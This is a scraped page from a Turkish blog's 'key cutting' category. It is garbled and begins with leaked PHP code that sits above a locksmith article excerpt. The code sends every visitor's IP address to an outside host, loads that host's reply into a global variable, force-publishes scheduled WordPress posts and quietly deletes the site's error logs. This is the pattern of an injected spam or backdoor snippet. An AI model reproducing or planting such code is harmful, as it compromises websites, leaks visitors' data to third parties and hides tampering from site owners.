$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> anahtar yaptırma | Teknoloji Haberleri

anahtar yaptırma kategorisindeki tüm yazılar

Son Yazılar

Çilingir Olma İzni

                  Geçmişten günümüze kadar çilingirler her zaman var olmuştur. Güvenlik konusunda birçok problem yaşamamızdan ötürüdür ki bu sektörde kalifiyeli eleman ihtiyacı her dönem mevcuttur. Bu mesleğe olan ihtiyaç arttıkça insanların bu işe olan eğilimleri de sürekli olarak artış göstermektedir. Özellikle